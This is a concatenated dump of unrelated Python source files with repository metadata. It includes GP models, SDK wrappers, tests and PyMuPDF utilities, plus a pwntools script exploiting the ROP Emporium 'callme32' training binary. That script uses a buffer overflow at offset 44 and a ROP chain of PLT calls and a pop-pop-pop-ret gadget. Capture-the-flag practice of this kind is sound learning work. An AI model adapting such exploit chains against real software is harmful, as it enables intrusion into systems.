if temp_vm1: temp_vm1.destroy() test_obj_dict.rm_vm(temp_vm1) if temp_vm2: temp_vm2.destroy() test_obj_dict.rm_vm(temp_vm2) vm_nic1 = vm1.vm.vmNics[0] vm_nic1_uuid = vm_nic1.uuid vm_nic2 = vm2.vm.vmNics[0] vm_nic2_uuid = vm_nic2.uuid pri_l3_uuid = vm_nic1.l3NetworkUuid vr = test_lib.lib_find_vr_by_l3_uuid(pri_l3_uuid)[0] vr_pub_nic = test_lib.lib_find_vr_pub_nic(vr) l3_uuid = vr_pub_nic.l3NetworkUuid vip1 = test_stub.create_vip('create_vip 1', l3_uuid) test_obj_dict.add_vip(vip1) eip1 = test_stub.create_eip('create eip 1', vip_uuid=vip1.get_vip().uuid, \ vnic_uuid=vm_nic1_uuid, vm_obj=vm1) vip1.attach_eip(eip1) vip2 = test_stub.create_vip('create_vip 2', l3_uuid) test_obj_dict.add_vip(vip2) eip2 = test_stub.create_eip('create eip 2', vip_uuid=vip2.get_vip().uuid, \ vnic_uuid=vm_nic2_uuid, vm_obj=vm2) vip2.attach_eip(eip2) vm1.check() vip1.check() vm2.check() vip2.check() test_lib.lib_check_ports_in_a_command(vm1.get_vm(), vip1.get_vip().ip, \ vip2.get_vip().ip, test_stub.target_ports, [], vm2.get_vm()) test_lib.lib_check_ports_in_a_command(vm2.get_vm(), vip2.get_vip().ip, \ vip1.get_vip().ip, test_stub.target_ports, [], vm1.get_vm()) vm1.destroy() test_obj_dict.rm_vm(vm1) test_lib.lib_check_ports_in_a_command(vm2.get_vm(), vip2.get_vip().ip, \ vip1.get_vip().ip, [], test_stub.target_ports, vm1.get_vm()) vm2.destroy() test_obj_dict.rm_vm(vm2) vip1.delete() test_obj_dict.rm_vip(vip1) vip2.delete() test_obj_dict.rm_vip(vip2) test_util.test_pass('Test 2 EIPs for 2 VMs Success') #Will be called only if exception happens in test(). def error_cleanup(): global test_obj_dict test_lib.lib_error_cleanup(test_obj_dict)
35.561404
84
0.681302
795a95e953e06912b18eb468361301249af57d5e
202
py
Python
text_to_speech.py
Atulbargotra/smart_driving
7356b468260c1f102528df702c412f3e9cbd74d5
[ "MIT" ]
4
2020-02-21T18:25:38.000Z
2021-11-14T20:23:15.000Z
text_to_speech.py
Atulbargotra/smart_driving
7356b468260c1f102528df702c412f3e9cbd74d5
[ "MIT" ]
3
2020-02-21T17:58:58.000Z
2020-02-21T17:58:59.000Z
text_to_speech.py
Atulbargotra/smart_driving
7356b468260c1f102528df702c412f3e9cbd74d5
[ "MIT" ]
4
2020-02-21T18:25:43.000Z
2021-01-13T10:04:20.000Z
from gtts import gTTS import playsound def speak(text_input,language='hi'): tts = gTTS(text=text_input, lang=language) tts.save("sounds/output.mp3") playsound.playsound('sounds/output.mp3')
28.857143
46
0.737624
795a969aa3575ade5de46b5eee98a0286e6e4d22
193
py
Python
01_Fernando/input_hub/log/logging.py
mlobf/new_pandas_course
ecf0ea529b22422a7e97719b89ba9037d0fb2be7
[ "BSD-3-Clause" ]
null
null
null
01_Fernando/input_hub/log/logging.py
mlobf/new_pandas_course
ecf0ea529b22422a7e97719b89ba9037d0fb2be7
[ "BSD-3-Clause" ]
null
null
null
01_Fernando/input_hub/log/logging.py
mlobf/new_pandas_course
ecf0ea529b22422a7e97719b89ba9037d0fb2be7
[ "BSD-3-Clause" ]
null
null
null
import logging logging.warning('This is a warnning') #basicConfig(filename='sample.log', level=logging.DEBUG) #logger = logging.getLogger() # Test logger #logger.info("Our fist message")
14.846154
56
0.740933
795a96a562ee75433ad08c3ab972d381cc06c540
6,781
py
Python
src/models/tsvgp_sites.py
AaltoML/t-SVGP
bfa6119ad071ca191d7a413e09b33811c18be533
[ "MIT" ]
4
2021-11-10T21:53:16.000Z
2021-11-11T08:39:11.000Z
src/models/tsvgp_sites.py
AaltoML/t-SVGP
bfa6119ad071ca191d7a413e09b33811c18be533
[ "MIT" ]
1
2021-11-07T18:56:49.000Z
2021-11-07T18:56:49.000Z
src/models/tsvgp_sites.py
AaltoML/t-SVGP
bfa6119ad071ca191d7a413e09b33811c18be533
[ "MIT" ]
null
null
null
""" Module for the t-SVGP models with individual sites per data point. """ from typing import Optional import numpy as np import tensorflow as tf from gpflow import default_jitter, kullback_leiblers from gpflow.conditionals import conditional from gpflow.covariances import Kuf, Kuu from gpflow.models import GPModel from gpflow.models.training_mixins import InputData, RegressionData from gpflow.models.util import inducingpoint_wrapper from gpflow.types import MeanAndVariance from src.sites import DiagSites from src.util import posterior_from_dense_site_white, project_diag_sites class t_SVGP_sites(GPModel): """ Class for the t-SVGP model with sites """ def __init__( self, data: RegressionData, kernel, likelihood, inducing_variable, *, mean_function=None, num_latent_gps: int = 1, lambda_1=None, lambda_2=None, num_latent: Optional[int] = 1 ): """ - kernel, likelihood, inducing_variables, mean_function are appropriate GPflow objects - num_latent_gps is the number of latent processes to use, defaults to 1 - q_diag is a boolean. If True, the covariance is approximated by a diagonal matrix. - whiten is a boolean. If True, we use the whitened representation of the inducing points. - num_data is the total number of observations, defaults to X.shape[0] (relevant when feeding in external minibatches) """ GPModel.__init__(self, kernel, likelihood, mean_function, num_latent_gps) x_data, y_data = data num_data = x_data.shape[0] self.num_data = num_data self.num_latent = num_latent or y_data.shape[1] self.data = data self.inducing_variable = inducingpoint_wrapper(inducing_variable) self.num_inducing = self.inducing_variable.num_inducing self._init_variational_parameters(self.num_data, lambda_1, lambda_2) self.whiten = False def _init_variational_parameters(self, num_inducing, lambda_1, lambda_2): """ Constructs the site parameters λ₁, Λ₂. for site t(u) = exp(uᵀλ₁ - ½ uᵀΛ₂u) Parameters ---------- :param num_inducing: int Number of inducing variables, typically referred to as M. 
:param lambda_1: np.array or None First order natural parameter of the variational site. :param lambda_2: np.array or None Second order natural parameter of the variational site. """ lambda_1 = np.zeros((num_inducing, self.num_latent_gps)) if lambda_1 is None else lambda_1 if lambda_2 is None: lambda_2 = ( np.ones((num_inducing, self.num_latent_gps)) * 1e-6 if lambda_2 is None else lambda_2 ) else: assert lambda_2.ndim == 2 self.num_latent_gps = lambda_2.shape[-1] self.sites = DiagSites(lambda_1, lambda_2) @property def lambda_1(self): """first natural parameter""" return self.sites.lambda_1 @property def lambda_2(self): """second natural parameter""" return self.sites.lambda_2 def get_mean_chol_cov_inducing_posterior(self): """ Computes the mean and cholesky factor of the posterior on the inducing variables q(u) = 𝓝(u; m, S) S = (K⁻¹ + Λ₂)⁻¹ = (K⁻¹ + L₂L₂ᵀ)⁻¹ = K - KL₂W⁻¹L₂ᵀK , W = (I + L₂ᵀKL₂)⁻¹ m = S λ₁ """ X, _ = self.data K_uu = Kuu( self.inducing_variable, self.kernel, jitter=default_jitter() ) # [P, M, M] or [M, M] K_uf = Kuf(self.inducing_variable, self.kernel, X) # [P, M, M] or [M, M] lambda_1, lambda_2 = project_diag_sites(K_uf, self.lambda_1, self.lambda_2, cholesky=False) return posterior_from_dense_site_white(K_uu, lambda_1, lambda_2) def natgrad_step(self, lr=0.1): """Takes natural gradient step in Variational parameters in the local parameters λₜ = rₜ▽[Var_exp] + (1-rₜ)λₜ₋₁ Input: :param: X : N x D :param: Y: N x 1 :param: lr: Scalar Output: Updates the params """ X, Y = self.data mean, var = self.predict_f(X) with tf.GradientTape() as g: g.watch([mean, var]) ve = self.likelihood.variational_expectations(mean, var, Y) grads = g.gradient(ve, [mean, var]) grads = grads[0] - 2.0 * grads[1] * mean, grads[1] # compute update in natural form lambda_2 = -0.5 * self.lambda_2 lambda_1 = self.lambda_1 lambda_1 = (1 - lr) * lambda_1 + lr * grads[0] lambda_2 = (1 - lr) * lambda_2 + lr * grads[1] eps = 1e-8 # crop hack, can't instantiate negative sites nats2 but 
optim might take you there lambda_2 = tf.minimum(lambda_2, -eps * tf.ones_like(lambda_2)) # To match SVGP you need to eliminate this jitter for minibatching self.lambda_1.assign(lambda_1) self.lambda_2.assign(-2.0 * lambda_2) def prior_kl(self) -> tf.Tensor: """Returns the KL divergence KL[q(u)|p(u)]""" q_mu, q_sqrt = self.get_mean_chol_cov_inducing_posterior() return kullback_leiblers.prior_kl( self.inducing_variable, self.kernel, q_mu, q_sqrt, whiten=self.whiten ) def maximum_log_likelihood_objective(self) -> tf.Tensor: """The variational lower bound""" return self.elbo() def elbo(self) -> tf.Tensor: """ This gives a variational bound (the evidence lower bound or ELBO) on the log marginal likelihood of the model. """ X, Y = self.data kl = self.prior_kl() f_mean, f_var = self.predict_f(X, full_cov=False, full_output_cov=False) var_exp = self.likelihood.variational_expectations(f_mean, f_var, Y) if self.num_data is not None: num_data = tf.cast(self.num_data, kl.dtype) minibatch_size = tf.cast(tf.shape(X)[0], kl.dtype) scale = num_data / minibatch_size else: scale = tf.cast(1.0, kl.dtype) return tf.reduce_sum(var_exp) * scale - kl def predict_f(self, Xnew: InputData, full_cov=False, full_output_cov=False) -> MeanAndVariance: q_mu, q_sqrt = self.get_mean_chol_cov_inducing_posterior() mu, var = conditional( Xnew, self.inducing_variable, self.kernel, q_mu, q_sqrt=q_sqrt, full_cov=full_cov, white=self.whiten, full_output_cov=full_output_cov, ) return mu + self.mean_function(Xnew), var
35.317708
99
0.620557
795a9726cabaf8e22639fa8b878c30be4aa6d47f
241
py
Python
simple_flask/views/account.py
gavinliu4011/simple_flask
31139e702b72f31e79f837413ce7bb53f53ce89f
[ "Apache-2.0" ]
null
null
null
simple_flask/views/account.py
gavinliu4011/simple_flask
31139e702b72f31e79f837413ce7bb53f53ce89f
[ "Apache-2.0" ]
null
null
null
simple_flask/views/account.py
gavinliu4011/simple_flask
31139e702b72f31e79f837413ce7bb53f53ce89f
[ "Apache-2.0" ]
null
null
null
from flask import Blueprint from flask import render_template from flask import request account = Blueprint('account', __name__) @account.route('/login.html', methods=['GET', "POST"]) def login(): return render_template('login.html')
21.909091
54
0.746888
795a996a31e95c116b11a47be8f982629158cf27
3,558
py
Python
tests/util.py
lene/haeqs_ml
572a69e6e93f262a1708d6c72ac64bec4af6f791
[ "BSD-2-Clause" ]
null
null
null
tests/util.py
lene/haeqs_ml
572a69e6e93f262a1708d6c72ac64bec4af6f791
[ "BSD-2-Clause" ]
null
null
null
tests/util.py
lene/haeqs_ml
572a69e6e93f262a1708d6c72ac64bec4af6f791
[ "BSD-2-Clause" ]
null
null
null
from data_sets.images_labels_data_set import DataSetBase from data_sets.data_sets import DataSets import numpy __author__ = 'Lene Preuss <lene.preuss@gmail.com>' MINIMAL_INPUT_SIZE = 2 MINIMAL_LAYER_GEOMETRY = (2, 2) MINIMAL_OUTPUT_SIZE = 2 MINIMAL_BATCH_SIZE = 2 def create_minimal_input_placeholder(): return tf.placeholder(tf.float32, shape=(MINIMAL_BATCH_SIZE, MINIMAL_INPUT_SIZE)) def get_project_root_folder(): import os return os.path.dirname(os.path.dirname(__file__)) def create_train_data_set(): train_data = create_vector([0, 0, 1, 1]).reshape(2, 2) train_labels = create_vector([0, 1], numpy.int8).reshape(2) return DataSetBase(train_data, train_labels) def create_train_data_sets(): train_data = create_train_data_set() return DataSets(train_data, train_data, train_data) def create_vector(values, type=numpy.float32): return numpy.fromiter(values, numpy.dtype(type)) def train_data_input(value): return create_vector([value, value]) def train_neural_network(train_data, graph=None): data_sets = DataSets(train_data, train_data, train_data) if graph is None: graph = NeuralNetworkGraph(train_data.input.shape[0], MINIMAL_LAYER_GEOMETRY, len(train_data.labels)) init_graph(graph) graph.train( data_sets=data_sets, steps_between_checks=50, max_steps=1000, batch_size=train_data.num_examples, precision=0.99 ) return graph def init_graph(graph, session=None): graph.init_trainer() graph.set_session(session) return graph def allow_fail(max_times_fail=1, silent=True): """Runs a test, if necessary repeatedly, allowing it to fail up to max_times_fail times. Usage: @allow_fail def test: ... # allows the test to be repeated once before considering the test failed @allow_fail(max_times_fail=2, silent=False) def test(): ... # allows the test to be repeated twice, printing a message on each failure This is useful if a test tests non-deterministic behavior, such as with stochastic algorithms. 
If the tests fails with probability p < 1, allowing it to fail n times causes the resulting test to fail with probability p^(n+1) < p. In particular it was written to test neural networks which are initialized randomly. :param max_times_fail: How often a test may fail before considering the test failed. :param silent: If False, prints a message before running the test and on each failure. :return: The decorated test method """ def allow_fail_decorator(func): """ :param func: The test allowed to be run repeatedly if it fails. :return: The decorated test function """ def run_test_checked(self): """ Runs the test, repeating it up to max_times_fail times if it fails. :param self: The test suite, presumably an object of type unittest.TestCase """ if not silent: print( '\ntrying {}.{}() max. {} times'.format( type(self).__name__, func.__name__, max_times_fail + 1 ) ) for i in range(max_times_fail): try: func(self) return except AssertionError: if not silent: print('failed {} times'.format(i+1)) # run the test unguarded for a last time func(self) return run_test_checked return allow_fail_decorator
31.486726
109
0.669758
795a9a24a2265068119948eca50bc7a8a5070c30
2,321
py
Python
pwn/rop_emporium/03-callme/32-bit/exploit.py
An00bRektn/CTF
f009b8dee93dfc28a1e3f335f8997a74b2cad653
[ "MIT" ]
null
null
null
pwn/rop_emporium/03-callme/32-bit/exploit.py
An00bRektn/CTF
f009b8dee93dfc28a1e3f335f8997a74b2cad653
[ "MIT" ]
null
null
null
pwn/rop_emporium/03-callme/32-bit/exploit.py
An00bRektn/CTF
f009b8dee93dfc28a1e3f335f8997a74b2cad653
[ "MIT" ]
null
null
null
#!/usr/bin/python3 from pwn import * # Allows you to switch between local/GDB/remote from terminal def start(argv=[], *a, **kw): if args.GDB: # Set GDBscript below return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw) elif args.REMOTE: # ('server', 'port') return remote(sys.argv[1], sys.argv[2], *a, **kw) else: # Run locally return process([exe] + argv, *a, **kw) def find_ip(payload): p = process(exe) p.sendlineafter('> ', payload) # Wait for the process to crash p.wait() # Print out the address of EIP/RIP at the time of crashing ip_offset = cyclic_find(p.corefile.pc) # x86 #ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64 info('located EIP/RIP offset at {a}'.format(a=ip_offset)) return ip_offset # Specify your GDB script here for debugging gdbscript = ''' break main '''.format(**locals()) # Set up pwntools for the correct architecture exe = './callme32' # This will automatically get context arch, bits, os etc elf = context.binary = ELF(exe, checksec=False) # Enable verbose logging so we can see exactly what is being sent (info/debug) context.log_level = 'debug' #=========================================================== # EXPLOIT GOES HERE #=========================================================== offset = 44 # find_ip(cyclic(100)) # Per the instructions param_1 = 0xdeadbeef param_2 = 0xcafebabe param_3 = 0xd00df00d io = start() # Note that these are all @plt addresses # Obtained via gdb: info functions callme_one = 0x080484f0 callme_two = 0x08048550 callme_three = 0x080484e0 # 0x080487f9: pop esi; pop edi; pop ebp; ret; pop_esi_edi_ebp_ret = 0x080487f9 # We need this gadget so we can restore the state of the stack # after each function call payload = flat({ offset: [ callme_one, pop_esi_edi_ebp_ret, param_1, param_2, param_3, callme_two, pop_esi_edi_ebp_ret, param_1, param_2, param_3, callme_three, pop_esi_edi_ebp_ret, param_1, param_2, param_3, ] }) io.sendlineafter("> ", payload) io.recvuntil('callme_two() called correctly\n') flag = 
io.recv() log.success(flag.decode("utf-8"))
27.305882
98
0.609651
795a9af0307b379c3c302a945fd2048a78805144
715
py
Python
python/packages/isce3/geometry/Geo2rdr.py
piyushrpt/isce3
1741af321470cb5939693459765d11a19c5c6fc2
[ "Apache-2.0" ]
null
null
null
python/packages/isce3/geometry/Geo2rdr.py
piyushrpt/isce3
1741af321470cb5939693459765d11a19c5c6fc2
[ "Apache-2.0" ]
null
null
null
python/packages/isce3/geometry/Geo2rdr.py
piyushrpt/isce3
1741af321470cb5939693459765d11a19c5c6fc2
[ "Apache-2.0" ]
null
null
null
#-*- coding: utf-8 -*- # # Heresh Fattahi, Bryan Riel # Copyright 2019- # The extensions from .. import isceextension class Geo2rdr(isceextension.pyGeo2rdr): """ Wrapper for Geo2rdr """ pass def geo2rdr_point(lonlatheight, ellipsoid, orbit, doppler, wavelength, side, threshold=0.05, maxiter=50, dR=1.0e-8): """ Wrapper for py_geo2rdr standalone function. """ azimuthTime, slantRange = isceextension.py_geo2rdr( lonlatheight, ellipsoid, orbit, doppler, wavelength, side, threshold=threshold, maxiter=maxiter, dR=dR ) return azimuthTime, slantRange
19.861111
55
0.584615
795a9c93aee2c7573c24d437de7b58ace7a20c39
875
py
Python
trac/notification/tests/__init__.py
clubturbo/Trac-1.4.2
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
[ "BSD-3-Clause" ]
null
null
null
trac/notification/tests/__init__.py
clubturbo/Trac-1.4.2
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
[ "BSD-3-Clause" ]
null
null
null
trac/notification/tests/__init__.py
clubturbo/Trac-1.4.2
254ce54a3c2fb86b4f31810ddeabbd4ff8b54a78
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # # Copyright (C) 2015-2020 Edgewall Software # All rights reserved. # # This software is licensed as described in the file COPYING, which # you should have received as part of this distribution. The terms # are also available at https://trac.edgewall.org/wiki/TracLicense. # # This software consists of voluntary contributions made by many # individuals. For the exact contribution history, see the revision # history and logs, available at https://trac.edgewall.org/log/. import unittest from . import api, mail, model, prefs def test_suite(): suite = unittest.TestSuite() suite.addTest(api.test_suite()) suite.addTest(mail.test_suite()) suite.addTest(model.test_suite()) suite.addTest(prefs.test_suite()) return suite if __name__ == '__main__': unittest.main(defaultTest='test_suite')
29.166667
68
0.709714
795a9d7ba286ea0359a3fd23df307d61380e61bc
324
py
Python
tests/system/brbeat.py
mlositsky/brbeat
b9858c3b2e7fbd689f8f043edfb876bfe6de7b9a
[ "Apache-2.0" ]
null
null
null
tests/system/brbeat.py
mlositsky/brbeat
b9858c3b2e7fbd689f8f043edfb876bfe6de7b9a
[ "Apache-2.0" ]
null
null
null
tests/system/brbeat.py
mlositsky/brbeat
b9858c3b2e7fbd689f8f043edfb876bfe6de7b9a
[ "Apache-2.0" ]
null
null
null
import sys sys.path.append('../../vendor/github.com/elastic/beats/libbeat/tests/system') from beat.beat import TestCase class BaseTest(TestCase): @classmethod def setUpClass(self): self.beat_name = "brbeat" self.build_path = "../../build/system-tests/" self.beat_path = "../../brbeat.test"
27
77
0.660494
795a9e2edef673bb75564472c51a3d3dd00bf5a3
3,992
py
Python
alipay/aop/api/request/AlipayDataIotdataDataDetailQueryRequest.py
snowxmas/alipay-sdk-python-all
96870ced60facd96c5bce18d19371720cbda3317
[ "Apache-2.0" ]
213
2018-08-27T16:49:32.000Z
2021-12-29T04:34:12.000Z
alipay/aop/api/request/AlipayDataIotdataDataDetailQueryRequest.py
snowxmas/alipay-sdk-python-all
96870ced60facd96c5bce18d19371720cbda3317
[ "Apache-2.0" ]
29
2018-09-29T06:43:00.000Z
2021-09-02T03:27:32.000Z
alipay/aop/api/request/AlipayDataIotdataDataDetailQueryRequest.py
snowxmas/alipay-sdk-python-all
96870ced60facd96c5bce18d19371720cbda3317
[ "Apache-2.0" ]
59
2018-08-27T16:59:26.000Z
2022-03-25T10:08:15.000Z
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.FileItem import FileItem from alipay.aop.api.constant.ParamConstants import * from alipay.aop.api.domain.AlipayDataIotdataDataDetailQueryModel import AlipayDataIotdataDataDetailQueryModel class AlipayDataIotdataDataDetailQueryRequest(object): def __init__(self, biz_model=None): self._biz_model = biz_model self._biz_content = None self._version = "1.0" self._terminal_type = None self._terminal_info = None self._prod_code = None self._notify_url = None self._return_url = None self._udf_params = None self._need_encrypt = False @property def biz_model(self): return self._biz_model @biz_model.setter def biz_model(self, value): self._biz_model = value @property def biz_content(self): return self._biz_content @biz_content.setter def biz_content(self, value): if isinstance(value, AlipayDataIotdataDataDetailQueryModel): self._biz_content = value else: self._biz_content = AlipayDataIotdataDataDetailQueryModel.from_alipay_dict(value) @property def version(self): return self._version @version.setter def version(self, value): self._version = value @property def terminal_type(self): return self._terminal_type @terminal_type.setter def terminal_type(self, value): self._terminal_type = value @property def terminal_info(self): return self._terminal_info @terminal_info.setter def terminal_info(self, value): self._terminal_info = value @property def prod_code(self): return self._prod_code @prod_code.setter def prod_code(self, value): self._prod_code = value @property def notify_url(self): return self._notify_url @notify_url.setter def notify_url(self, value): self._notify_url = value @property def return_url(self): return self._return_url @return_url.setter def return_url(self, value): self._return_url = value @property def udf_params(self): return self._udf_params @udf_params.setter def udf_params(self, value): if not isinstance(value, dict): return self._udf_params = value @property def 
need_encrypt(self): return self._need_encrypt @need_encrypt.setter def need_encrypt(self, value): self._need_encrypt = value def add_other_text_param(self, key, value): if not self.udf_params: self.udf_params = dict() self.udf_params[key] = value def get_params(self): params = dict() params[P_METHOD] = 'alipay.data.iotdata.data.detail.query' params[P_VERSION] = self.version if self.biz_model: params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':')) if self.biz_content: if hasattr(self.biz_content, 'to_alipay_dict'): params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':')) else: params['biz_content'] = self.biz_content if self.terminal_type: params['terminal_type'] = self.terminal_type if self.terminal_info: params['terminal_info'] = self.terminal_info if self.prod_code: params['prod_code'] = self.prod_code if self.notify_url: params['notify_url'] = self.notify_url if self.return_url: params['return_url'] = self.return_url if self.udf_params: params.update(self.udf_params) return params def get_multipart_params(self): multipart_params = dict() return multipart_params
27.531034
148
0.646293
795a9e3661ec107f0ad658d721067a3093373064
107,486
py
Python
libs/fitz/utils.py
rocketbot-cl/Pdf2Jpg
2ea2b89af51ea77e73bbfe4f6b47d18028d8e2d8
[ "MIT" ]
null
null
null
libs/fitz/utils.py
rocketbot-cl/Pdf2Jpg
2ea2b89af51ea77e73bbfe4f6b47d18028d8e2d8
[ "MIT" ]
null
null
null
libs/fitz/utils.py
rocketbot-cl/Pdf2Jpg
2ea2b89af51ea77e73bbfe4f6b47d18028d8e2d8
[ "MIT" ]
1
2022-03-29T15:36:24.000Z
2022-03-29T15:36:24.000Z
from __future__ import division from fitz import * import math import os import warnings import io """ The following is a collection of functions to extend PyMupdf. """ def showPDFpage( page, rect, src, pno=0, overlay=True, keep_proportion=True, rotate=0, reuse_xref=0, clip=None, ): """Show page number 'pno' of PDF 'src' in rectangle 'rect'. Args: rect: (rect-like) where to place the source image src: (document) source PDF pno: (int) source page number overlay: (bool) put in foreground keep_proportion: (bool) do not change width-height-ratio rotate: (int) degrees (multiple of 90) clip: (rect-like) part of source page rectangle Returns: xref of inserted object (for reuse) """ def calc_matrix(sr, tr, keep=True, rotate=0): """ Calculate transformation matrix from source to target rect. Notes: The product of four matrices in this sequence: (1) translate correct source corner to origin, (2) rotate, (3) scale, (4) translate to target's top-left corner. Args: sr: source rect in PDF (!) coordinate system tr: target rect in PDF coordinate system keep: whether to keep source ratio of width to height rotate: rotation angle in degrees Returns: Transformation matrix. """ # calc center point of source rect smp = Point((sr.x1 + sr.x0) / 2., (sr.y1 + sr.y0) / 2.) # calc center point of target rect tmp = Point((tr.x1 + tr.x0) / 2., (tr.y1 + tr.y0) / 2.) 
rot = Matrix(rotate) # rotation matrix # m moves to (0, 0), then rotates m = Matrix(1, 0, 0, 1, -smp.x, -smp.y) * rot sr1 = sr * m # resulting source rect to calculate scale factors fw = tr.width / sr1.width # scale the width fh = tr.height / sr1.height # scale the height if keep: fw = fh = min(fw, fh) # take min if keeping aspect ratio m *= Matrix(fw, fh) # concat scale matrix m *= Matrix(1, 0, 0, 1, tmp.x, tmp.y) # concat move to target center return m CheckParent(page) doc = page.parent if not doc.isPDF or not src.isPDF: raise ValueError("not a PDF") rect = page.rect & rect # intersect with page rectangle if rect.isEmpty or rect.isInfinite: raise ValueError("rect must be finite and not empty") if reuse_xref > 0: warnings.warn("ignoring 'reuse_xref'", DeprecationWarning) while pno < 0: # support negative page numbers pno += len(src) src_page = src[pno] # load ource page if len(src_page._getContents()) == 0: raise ValueError("nothing to show - source page empty") tar_rect = rect * ~page._getTransformation() # target rect in PDF coordinates src_rect = src_page.rect if not clip else src_page.rect & clip # source rect if src_rect.isEmpty or src_rect.isInfinite: raise ValueError("clip must be finite and not empty") src_rect = src_rect * ~src_page._getTransformation() # ... 
in PDF coord matrix = calc_matrix(src_rect, tar_rect, keep=keep_proportion, rotate=rotate) # list of existing /Form /XObjects ilst = [i[1] for i in doc._getPageInfo(page.number, 3)] # create a name that is not in that list n = "fzFrm" i = 0 _imgname = n + "0" while _imgname in ilst: i += 1 _imgname = n + str(i) isrc = src._graft_id # used as key for graftmaps if doc._graft_id == isrc: raise ValueError("source document must not equal target") # check if we have already copied objects from this source doc if isrc in doc.Graftmaps: # yes: use the old graftmap gmap = doc.Graftmaps[isrc] else: # no: make a new graftmap gmap = Graftmap(doc) doc.Graftmaps[isrc] = gmap # take note of generated xref for automatic reuse pno_id = (isrc, pno) # id of src[pno] xref = doc.ShownPages.get(pno_id, 0) xref = page._showPDFpage( src_page, overlay=overlay, matrix=matrix, xref=xref, clip=src_rect, graftmap=gmap, _imgname=_imgname, ) doc.ShownPages[pno_id] = xref return xref def insertImage(page, rect, filename=None, pixmap=None, stream=None, rotate=0, keep_proportion = True, overlay=True): """Insert an image in a rectangle on the current page. Notes: Exactly one of filename, pixmap or stream must be provided. Args: rect: (rect-like) where to place the source image filename: (str) name of an image file pixmap: (obj) a Pixmap object stream: (bytes) an image in memory rotate: (int) degrees (multiple of 90) keep_proportion: (bool) whether to maintain aspect ratio overlay: (bool) put in foreground """ def calc_matrix(fw, fh, tr, rotate=0): """ Calculate transformation matrix for image insertion. Notes: The image will preserve its aspect ratio if and only if arguments fw, fh are both equal to 1. Args: fw, fh: width / height ratio factors of image - floats in (0,1]. At least one of them (corresponding to the longer side) is equal to 1. tr: target rect in PDF coordinates rotate: rotation angle in degrees Returns: Transformation matrix. 
""" # center point of target rect tmp = Point((tr.x1 + tr.x0) / 2., (tr.y1 + tr.y0) / 2.) rot = Matrix(rotate) # rotation matrix # matrix m moves image center to (0, 0), then rotates m = Matrix(1, 0, 0, 1, -0.5, -0.5) * rot #sr1 = sr * m # resulting image rect # -------------------------------------------------------------------- # calculate the scale matrix # -------------------------------------------------------------------- small = min(fw, fh) # factor of the smaller side if rotate not in (0, 180): fw, fh = fh, fw # width / height exchange their roles if fw < 1: # portrait if tr.width / fw > tr.height / fh: w = tr.height * small h = tr.height else: w = tr.width h = tr.width / small elif fw != fh: # landscape if tr.width / fw > tr.height / fh: w = tr.height / small h = tr.height else: w = tr.width h = tr.width * small else: # (treated as) equal sided w = tr.width h = tr.height m *= Matrix(w, h) # concat scale matrix m *= Matrix(1, 0, 0, 1, tmp.x, tmp.y) # concat move to target center return m # ------------------------------------------------------------------------- CheckParent(page) doc = page.parent if not doc.isPDF: raise ValueError("not a PDF") if bool(filename) + bool(stream) + bool(pixmap) != 1: raise ValueError("need exactly one of filename, pixmap, stream") if filename and not os.path.exists(filename): raise FileNotFoundError("No such file: '%s'" % filename) elif stream and type(stream) not in (bytes, bytearray, io.BytesIO): raise ValueError("stream must be bytes-like or BytesIO") elif pixmap and type(pixmap) is not Pixmap: raise ValueError("pixmap must be a Pixmap") while rotate < 0: rotate += 360 while rotate >= 360: rotate -= 360 if rotate not in (0, 90, 180, 270): raise ValueError("bad rotate value") r = page.rect & rect if r.isEmpty or r.isInfinite: raise ValueError("rect must be finite and not empty") _imgpointer = None # ------------------------------------------------------------------------- # Calculate the matrix for image insertion. 
# ------------------------------------------------------------------------- # If aspect ratio must be kept, we need to know image width and height. # Easy for pixmaps. For file and stream cases, we make an fz_image and # take those values from it. In this case, we also hand the fz_image over # to the actual C-level function (_imgpointer), and set all other # parameters to None. # ------------------------------------------------------------------------- if keep_proportion is True: # for this we need the image dimension if pixmap: # this is the easy case w = pixmap.width h = pixmap.height elif stream: # use tool to access the information # we also pass through the generated fz_image address if type(stream) is io.BytesIO: stream = stream.getvalue() img_prof = TOOLS.image_profile(stream, keep_image=True) w, h = img_prof["width"], img_prof["height"] stream = None # make sure this arg is NOT used _imgpointer = img_prof["image"] # pointer to fz_image else: # worst case: must read the file img = open(filename, "rb") stream = img.read() img_prof = TOOLS.image_profile(stream, keep_image=True) w, h = img_prof["width"], img_prof["height"] stream = None # make sure this arg is NOT used filename = None # make sure this arg is NOT used img.close() # close image file _imgpointer = img_prof["image"] # pointer to fz_image maxf = max(w, h) fw = w / maxf fh = h / maxf else: fw = fh = 1.0 clip = r * ~page._getTransformation() # target rect in PDF coordinates matrix = calc_matrix(fw, fh, clip, rotate=rotate) # calculate matrix # Create a unique image reference name. First make existing names list. 
ilst = [i[7] for i in doc.getPageImageList(page.number)] # existing names n = "fzImg" # 'fitz image' i = 0 _imgname = n + "0" # first name candidate while _imgname in ilst: i += 1 _imgname = n + str(i) # try new name page._insertImage( filename=filename, # image in file pixmap=pixmap, # image in pixmap stream=stream, # image in memory matrix=matrix, # generated matrix overlay=overlay, _imgname=_imgname, # generated PDF resource name _imgpointer=_imgpointer, # address of fz_image ) def getImageBbox(page, item): """Calculate the rectangle (bbox) of a PDF image. Args: :page: the PyMuPDF page object :item: item from doc.getPageImageList(page.number, full=True) Returns: The bbox (fitz.Rect) of the image. Notes: This function can be used to find a connection between images returned by page.getText("dict") and the images referenced in the list page.getImageList(). """ def calc_matrix(cont, imgname): imgnm = ("/" + imgname).encode() cont = cont.replace(b"/", b" /") # prepend slashes with a space # split this, ignoring white spaces cont = cont.split() if imgnm not in cont: return Matrix() idx = cont.index(imgnm) # the image name mat_list = [] while idx >= 0: # start position is "/Image Do" location if cont[idx] == b"q": # finished at leading stacking command break if cont[idx] == b"cm": # encountered a matrix command mat = cont[idx - 6 : idx] # list of the 6 matrix values l = list(map(float, mat)) # make them floats mat_list.append(Matrix(l)) # append fitz matrix idx -= 6 # step backwards 6 entries else: idx -= 1 # step backwards l = 